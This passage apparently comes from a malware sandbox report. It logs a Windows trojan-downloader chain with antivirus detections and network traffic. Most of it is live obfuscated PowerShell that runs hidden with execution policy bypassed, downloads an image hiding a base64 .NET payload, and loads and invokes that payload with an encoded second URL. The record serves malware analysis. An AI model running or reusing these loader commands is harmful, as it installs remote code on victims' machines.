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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
cmdline | powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))" |
Kaspersky | HEUR:Trojan.Script.Generic |
Detected | |
Ikarus | Trojan-Downloader.VBS.Agent |
Data received | |
Data received | F |
Data sent | t pe0ö¬ã4¥ýÀ«îuú]Û&7³ïH È;ù±)í / 5 ÀÀÀ À 2 8 /ÿ wallpapercave.com |
Data sent | t pe0öÛ`Îå÷!zÑ«£Xá[ÅÏàæ6KÀÔ / 5 ÀÀÀ À 2 8 /ÿ wallpapercave.com |
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVQByAuOvhPbYLGwAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBoAuOvhPbYLHQAuOvhPbYLdAuOvhPbYLBwAuOvhPbYLHMAuOvhPbYLOgAuOvhPbYLvAuOvhPbYLC8AuOvhPbYLdwBhAuOvhPbYLGwAuOvhPbYLbAuOvhPbYLBwAuOvhPbYLGEAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLHIAuOvhPbYLYwBhAuOvhPbYLHYAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLGMAuOvhPbYLbwBtAuOvhPbYLC8AuOvhPbYLdQB3AuOvhPbYLHAuOvhPbYLAuOvhPbYLLwB1AuOvhPbYLHcAuOvhPbYLcAuOvhPbYLAuOvhPbYL0AuOvhPbYLDAuOvhPbYLAuOvhPbYLOAuOvhPbYLAuOvhPbYLyAuOvhPbYLDkAuOvhPbYLOAuOvhPbYLAuOvhPbYL5AuOvhPbYLC4AuOvhPbYLcAuOvhPbYLBuAuOvhPbYLGcAuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLdwBlAuOvhPbYLGIAuOvhPbYLQwBsAuOvhPbYLGkAuOvhPbYLZQBuAuOvhPbYLHQAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLTgBlAuOvhP